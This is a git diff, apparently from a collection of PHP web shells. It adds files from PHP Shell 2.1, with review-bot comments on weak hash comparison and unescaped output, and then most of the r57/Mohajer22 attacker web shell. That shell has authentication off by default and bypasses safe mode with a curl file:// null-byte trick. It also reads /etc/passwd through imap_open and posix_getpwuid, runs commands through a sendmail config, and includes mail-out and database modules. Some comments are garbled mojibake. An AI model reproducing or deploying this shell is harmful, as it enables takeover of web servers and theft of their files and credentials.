If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . 
$columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> + + <script type="text/javascript"> + <?php if ($_SESSION['authenticated']) { ?> + + var current_line = 0; + var command_hist = new Array(<?php echo $js_command_hist ?>); + var last = 0; + + function key(e) { + if (!e) var e = window.event; + + if (e.keyCode == 38 && current_line < command_hist.length-1) { + command_hist[current_line] = document.shell.command.value; + current_line++; + document.shell.command.value = command_hist[current_line]; + } + + if (e.keyCode == 40 && current_line > 0) { + command_hist[current_line] = document.shell.command.value; + current_line--; + document.shell.command.value = command_hist[current_line]; + } + + } + + function init() { + document.shell.setAttribute("autocomplete", "off"); + document.shell.output.scrollTop = document.shell.output.scrollHeight; + 
document.shell.command.focus(); + } + + <?php } else { ?> + + function init() { + document.shell.username.focus(); + } + + <?php } ?> + </script> +</head> + +<body onload="init()"> + +<h1>PHP Shell 2.1</h1> + +<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post"> + +<?php +if (!$_SESSION['authenticated']) { + /* Genereate a new nounce every time we preent the login page. This binds + * each login to a unique hit on the server and prevents the simple replay + * attack where one uses the back button in the browser to replay the POST + * data from a login. */ + $_SESSION['nounce'] = mt_rand(); + +?> + +<fieldset> + <legend>Authentication</legend> + + <?php + if (!empty($username)) + echo ' <p class="error">Login failed, please try again:</p>' . "\n"; + else + echo " <p>Please login:</p>\n"; + ?> + + <p>Username: <input name="username" type="text" value="<?php echo $username + ?>"></p> + + <p>Password: <input name="password" type="password"></p> + + <p><input type="submit" value="Login"></p> + + <input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>"> + +</fieldset> + +<?php } else { /* Authenticated. */ ?> + +<fieldset> + <legend>Current Working Directory: <code><?php + echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8'); + ?></code></legend> + + +<div id="terminal"> +<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>"> +<?php +$lines = substr_count($_SESSION['output'], "\n"); +$padding = str_repeat("\n", max(0, $rows+1 - $lines)); +echo rtrim($padding . 
$_SESSION['output']); +?> +</textarea> +<p id="prompt"> + $&nbsp;<input name="command" type="text" + onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1"> +</p> +</div> + +<p> + <span style="float: right">Size: <input type="text" name="rows" size="2" + maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text" + name="columns" size="2" maxlength="3" value="<?php echo $columns + ?>"></span> + +<input type="submit" value="Execute Command"> + <input type="submit" name="logout" value="Logout"> +</p> + +</fieldset> + +<?php } ?> + +</form> + + +<hr> + +<p>Please consult the <a href="README">README</a>, <a +href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for +instruction on how to use PHP Shell.</p> + +<hr> + +<address> +Copyright &copy; 2000&ndash;2005, <a +href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the +latest version at <a +href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. +</address> + +</body> +</html> diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php b/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php new file mode 100644 index 0000000..e45ee15 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/pwhash.php 
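Review bot: The credential check in the "Attempt authentication" block compares with loose `==` and calls whatever function name the config entry supplies: `$_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);`. Under `==`, two digest strings that both look numeric (for example `0e` followed only by digits) compare equal, and `$fkt` is invoked without checking that it is a supported hash function or that the entry really had three fields. I would restrict the name and compare strictly, `if (in_array($fkt, array('md5', 'sha1'), true)) $_SESSION['authenticated'] = ($fkt($salt . $password) === $hash);`, using `hash_equals()` instead where the PHP version provides it; the clear-text branch above needs `===` as well. Further down, the login form prints `value="<?php echo $username ?>"` from POST data without `htmlspecialchars()`, which should be escaped before output.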
@@ -0,0 +1,100 @@ +<?php +/* + * pwhash.php file for PHP Shell 2.1 + * Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net> + * Licensed under the GNU GPL. See the file COPYING for details. + */ + +function stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? $_POST['password'] : ''; + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>Password Hasher for PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> +</head> + +<body> + +<h1>Password Hasher for PHP Shell 2.1</h1> + +<form action="<?php $_SERVER['PHP_SELF']; ?>" method="POST"> + +<fieldset> + <legend>Username</legend> + <input name="username" type="text" value="<?php echo $username ?>"> +</fieldset> + +<fieldset> + <legend>Password</legend> + <input name="password" type="text" value="<?php echo $password ?>"> +</fieldset> + +<fieldset> + <legend>Result</legend> + +<?php +if ($username == '' || $password == '') { + echo " <p><i>Enter a username and a password and update.</i></p>\n"; +} else { + + $u = strtolower($username); + + if (preg_match('/[[ |&~!()]/', $u) || $u == 'null' || + $u == 'yes' || $u == 'no' || $u == 'true' || $u == 'false') { + + echo ' <p class="error">Your username cannot contain any of the following reserved + word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>", or + "<tt>false</tt>". The following characters are also prohibited: + "<tt>&nbsp;</tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pipe), + "<tt>&</tt>" (ampersand), "<tt>~</tt>" (tilde), "<tt>!</tt>" (exclamation + mark), "<tt>(</tt>" (left parenthesis), or "<tt>)</tt>" (right + parenthesis).</p>' . 
"\n"; + + echo ' <p>Please choose another username and try again.</p>' . "\n"; + + } else { + echo " <p>Write the following line into <tt>config.php</tt> " . + "in the <tt>users</tt> section:</p>\n"; + + $fkt = 'md5'; // Change to sha1 is you feel like it... + $salt = dechex(mt_rand()); + + $hash = $fkt . ':' . $salt . ':' . $fkt($salt . $password); + + echo "<pre>\n"; + echo htmlentities(str_pad($username, 8) . ' = "' . $hash . '"') . "\n"; + echo "</pre>\n"; + } +} +?> + +<p><input type="submit" value="Update"></p> + +</fieldset> + +</form> + + +<hr> + +<address> +Copyright &copy; 2005, <a href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the +latest version at <a href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. +</address> + +</body> +</html> diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/style.css b/php/PHPshell/م€گphpshell-2.1م€‘/style.css new file mode 100644 index 0000000..49ccbe5 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/style.css @@ -0,0 +1,58 @@ +/* style.css file for PHP Shell 2.1 + * Copyright (C) 2003-2005 Martin Geisler <mgeisler@mgeisler.net> + * Licensed under the GNU GPL. See the file COPYING for details. + */ + +body { + font-family: sans-serif; + color: black; + background: white; +} + +h1 { + color: red; + background: white; +} + +img { + border: none; +} + +div#terminal { + border: inset 2px red; + padding: 2px; + margin-top: 0.5em; +} + +div#terminal textarea { + font-size: 100%; + width: 100%; + border: none; +} + +p { + margin-top: 0.5em; + margin-bottom: 0.5em; +} + +p#prompt { + font-family: monospace; + margin: 0px; +} + +p#prompt input { + border: none; + font-family: monospace; +} + +legend { + padding-right: 0.5em; +} + +fieldset { + padding: 0.5em; +} + +.error { + color: red; +} \ No newline at end of file diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt b/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt new file mode 100644 index 0000000..1e5ff05 --- /dev/null 
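Review bot: In pwhash.php both form fields echo POST data straight into an attribute, `value="<?php echo $username ?>"` and `value="<?php echo $password ?>"`, so a double quote in either value breaks out of the attribute; the result line further down already goes through `htmlentities()`. Escape the two fields the same way, e.g. `value="<?php echo htmlspecialchars($username, ENT_QUOTES, 'UTF-8') ?>"`. The form's `action="<?php $_SERVER['PHP_SELF']; ?>"` has no `echo` and renders empty; leaving it empty is fine, but printing PHP_SELF there would need the same escaping. The generated value is a single salted `md5` with a `mt_rand()` salt, which is cheap to brute-force if config.php is disclosed; moving to `password_hash()` would need a matching change in the verifier in phpshell3.php.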
+++ b/php/PHPshell/م€گphpshell-2.1م€‘/ه¤‡و³¨.txt @@ -0,0 +1 @@ +ذ轫ثùسذخؤ¼‏ةد´«ضء·‏خٌئ÷²إ؟ةت¹سأ diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg new file mode 100644 index 0000000..26e996d Binary files /dev/null and b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.jpg differ diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php new file mode 100644 index 0000000..0fc3204 --- /dev/null +++ b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer22.php 
@@ -0,0 +1,2369 @@ +<?php + + +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - أ±أھأ°أ¨أ¯أ² أ­أ  أ¯أµأ¯ أ¯أ®أ§أ¢أ®أ«أ؟أ¾أ¹أ¨أ© أ¢أ أ¬ أ¢أ»أ¯أ®أ«أ­أ؟أ²أ¼ أ±أ¨أ±أ²أ¥أ¬أ­أ»أ¥ أھأ®أ¬أ أ­أ¤أ» أ­أ  أ±أ¥أ°أ¢أ¥أ°أ¥ أ·أ¥أ°أ¥أ§ أ،أ°أ أ³أ§أ¥أ° +/* أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ±أھأ أ·أ أ²أ¼ أ­أ®أ¢أ³أ¾ أ¢أ¥أ°أ±أ¨أ¾ أ­أ  أ­أ أ¸أ¥أ¬ أ±أ أ©أ²أ¥: http://rst.void.ru +/* أ‚أ¥أ°أ±أ¨أ؟: 1.3 (05.03.2006) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* أژأ²أ¤أ¥أ«أ¼أ­أ أ؟ أ،أ«أ أ£أ®أ¤أ أ°أ­أ®أ±أ²أ¼ أ§أ  أ¯أ®أ¬أ®أ¹أ¼ أ¨ أ¨أ¤أ¥أ¨: blf, phoenix, virus, NorD أ¨ أ¢أ±أ¥أ¬ أ·أ¥أ°أ²أ؟أ¬ أ¨أ§ RST/GHC. +/* أ…أ±أ«أ¨ أ³ أ‚أ أ± أ¥أ±أ²أ¼ أھأ أھأ¨أ¥-أ«أ¨أ،أ® أ¨أ¤أ¥أ¨ أ¯أ® أ¯أ®أ¢أ®أ¤أ³ أ²أ®أ£أ® أھأ أھأ¨أ¥ أ´أ³أ­أھأ¶أ¨أ¨ أ±أ«أ¥أ¤أ³أ¥أ² أ¤أ®أ،أ أ¢أ¨أ²أ¼ أ¢ أ±أھأ°أ¨أ¯أ² أ²أ® أ¯أ¨أ¸أ¨أ²أ¥ +/* أ­أ  rst@void.ru. أ‚أ±أ¥ أ¯أ°أ¥أ¤أ«أ®أ¦أ¥أ­أ¨أ؟ أ،أ³أ¤أ³أ² أ°أ أ±أ±أ¬أ®أ²أ°أ¥أ­أ». 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ أچأ أ±أ²أ°أ®أ©أھأ¨ | Options ~~~ */ + +// أ‚أ»أ،أ®أ° أ؟أ§أ»أھأ  | Language +// $language='ru' - أ°أ³أ±أ±أھأ¨أ© (russian) +// $language='eng' - english (أ أ­أ£أ«أ¨أ©أ±أھأ¨أ©) +$language='eng'; + +// أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ | Authentification +// $auth = 1; - أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ أ¢أھأ«أ¾أ·أ¥أ­أ  ( authentification = On ) +// $auth = 0; - أ€أ³أ²أ¥أ­أ²أ¨أ´أ¨أھأ أ¶أ¨أ؟ أ¢أ»أھأ«أ¾أ·أ¥أ­أ  ( authentification = Off ) +$auth = 0; + +// أ‹أ®أ£أ¨أ­ أ¨ أ¯أ أ°أ®أ«أ¼ أ¤أ«أ؟ أ¤أ®أ±أ²أ³أ¯أ  أھ أ±أھأ°أ¨أ¯أ²أ³ (Login & Password for access) +// أچأ… أ‡أ€أپأ“أ„أœأ’أ… أ‘أŒأ…أچأˆأ’أœ أڈأ…أگأ…أ„ أگأ€أ‡أŒأ…أ™أ…أچأˆأ…أŒ أچأ€ أ‘أ…أگأ‚أ…أگأ…!!! (CHANGE THIS!!!) +// أ‹أ®أ£أ¨أ­ أ¨ أ¯أ أ°أ®أ«أ¼ أ¸أ¨أ´أ°أ³أ¾أ²أ±أ؟ أ± أ¯أ®أ¬أ®أ¹أ¼أ¾ أ أ«أ£أ®أ°أ¨أ²أ¬أ  md5, أ§أ­أ أ·أ¥أ­أ¨أ؟ أ¯أ® أ³أ¬أ®أ«أ·أ أ­أ¨أ¾ 'r57' +// Login & password crypted with md5, default is 'r57' +$name='7fea0708f4bc4266ab5efcd242028106'; // أ«أ®أ£أ¨أ­ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ (user login) +$pass='a66abb5684c45962d887564f08346e8d'; // أ¯أ أ°أ®أ«أ¼ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ (user password) +/******************************************************************************************************/ +if(empty($_POST['Mohajer22'])){ + +} else { +$m=$_POST['Mohajer22']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} + + + +$string = !empty($_POST['string']) ? $_POST['string'] : 0; +$switch = !empty($_POST['switch']) ? 
$_POST['switch'] : 0; + +if ($string && $switch == "file") { +$stream = imap_open($string, "", ""); + +$str = imap_body($stream, 1); +if (!empty($str)) +echo "<pre>".$str."</pre>"; +imap_close($stream); +} elseif ($string && $switch == "dir") { +$stream = imap_open("/etc/passwd", "", ""); +if ($stream == FALSE) +die("Can't open imap stream"); + +$string = explode("|",$string); +if (count($string) > 1) +$dir_list = imap_list($stream, trim($string[0]), trim($string[1])); +else +$dir_list = imap_list($stream, trim($string[0]), "*"); +echo "<pre>"; +for ($i = 0; $i < count($dir_list); $i++) +echo "$dir_list[$i]"."<p>&nbsp;</p>" ; +echo "</pre>"; +imap_close($stream); +} + + +if ($_POST['plugin'] && ($submit == "Show")){ + $param1 = $_POST[param1]; + $param2 = $_POST[param2]; + + switch($_POST['plugin']){ + case("cat /etc/passwd"): + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "<br>"; + } + } + + break; + + case ("/bin/ls"): + if($param1){$exec = "/bin/ls ". $param1;} + else{$exec = "/bin/ls";} + $fp = popen("$exec", "r"); + print $fp; + pclose($fp); + break; + + case("tempnam"): + $cmd = $param1; + $script=tempnam("/tmp", "script"); + $cf=tempnam("/tmp", "cf"); + $fd = fopen($cf, "w"); + fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . 
"$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script"); + fclose($fd); + $fd = fopen($script, "w"); + fwrite($fd, "rm -f $script $cf; "); + fwrite($fd, $cmd); + fclose($fd); + break; + + case("/tmp"): + $target_file= $param1; + if (!$param2){$tmp_file="/tmp/tmp.ghc";} + else{$tmp_file = $param2;} + print copy($target_file, $tmp_file); + + $handle = fopen ($tmp_file, "r"); + while (!feof ($handle)) { + $buffer = fgets($handle, 4096); + echo $buffer; + } + fclose ($handle); + break; + + } + } + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- أ‡أ¤أ°أ أ¢أ±أ²أ¢أ³أ© أ‚أ أ±أ؟ --> +<html> +<head> +<title>MOHAJER22</title> +<meta http-equiv="Content-Language" content="en-us"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +BACKGROUND-COLOR: #000000; +COLOR:red; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +BACKGROUND-COLOR:black; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; 
+BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #000000; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #000000 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #000000 1px outset; +BACKGROUND-COLOR: #000000; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #000000; +COLOR: #ffffff; +font: Fixedsys bold; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #993333; +COLOR: #ffffff; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR:black; +COLOR: #ffffff; +width: 40%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #000000; +COLOR: #ffffff; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +BACKGROUND-COLOR:black; +COLOR: #ffffff; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:red;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? 
getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . 
+ pack('v', sizeof($this -> ctrl_dir)) .
+ pack('v', sizeof($this -> ctrl_dir)) .
+ pack('V', strlen($ctrldir)) .
+ pack('V', strlen($data)) .
+ "\x00\x00";
+ }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+ global $content_encoding;
+ global $mime_type;
+ if ($compress == 'bzip' && @function_exists('bzcompress'))
+ {
+ $filename .= '.bz2';
+ $mime_type = 'application/x-bzip2';
+ $filedump = bzcompress($filedump);
+ }
+ else if ($compress == 'gzip' && @function_exists('gzencode'))
+ {
+ $filename .= '.gz';
+ $content_encoding = 'x-gzip';
+ $mime_type = 'application/x-gzip';
+ $filedump = gzencode($filedump);
+ }
+ else if ($compress == 'zip' && @function_exists('gzcompress'))
+ {
+ $filename .= '.zip';
+ $mime_type = 'application/zip';
+ $zipfile = new zipfile();
+ $zipfile -> addFile($filedump, substr($filename, 0, -4));
+ $filedump = $zipfile -> file();
+ }
+ else
+ {
+ $mime_type = 'application/octet-stream';
+ }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+ {
+ switch($this->db)
+ {
+ case 'MySQL':
+ if(empty($this->port)) { $this->port = '3306'; }
+ if(!function_exists('mysql_connect')) return 0;
+ $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+ if(is_resource($this->connection)) return 1;
+ break;
+ case 'MSSQL':
+ if(empty($this->port)) { $this->port = '1433'; }
+ if(!function_exists('mssql_connect')) return 0;
+ $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+ if($this->connection) return 1;
+ break;
+ case 'PostgreSQL':
+ if(empty($this->port)) { $this->port = '5432'; }
+ $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+ if(!function_exists('pg_connect')) return 0;
+ $this->connection = @pg_connect($str);
+ if(is_resource($this->connection)) return 1;
+ break;
+ case 'Oracle':
+ if(!function_exists('ocilogon')) return 0;
+ $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+ if(is_resource($this->connection)) return 1;
+ break;
+ }
+ return 0;
+ }
+
+ function select_db()
+ {
+ switch($this->db)
+ {
+ case 'MySQL':
+ if(@mysql_select_db($this->base,$this->connection)) return 1;
+ break;
+ case 'MSSQL':
+ if(@mssql_select_db($this->base,$this->connection)) return 1;
+ break;
+ case 'PostgreSQL':
+ return 1;
+ break;
+ case 'Oracle':
+ return 1;
+ break;
+ }
+ return 0;
+ }
+
+ function query($query)
+ {
+ $this->res=$this->error='';
+ switch($this->db)
+ {
+ case 'MySQL':
+ if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+ {
+ $this->error = @mysql_error($this->connection);
+ return 0;
+ }
+ else if(is_resource($this->res)) { return 1; }
+ return 2;
+ break;
+ case 'MSSQL':
+ if(false===($this->res=@mssql_query($query,$this->connection)))
+ {
+ $this->error = 'Query error';
+ return 0;
+ }
+ else if(@mssql_num_rows($this->res) > 0) { return 1; }
+ return 2;
+ break;
+ case 'PostgreSQL':
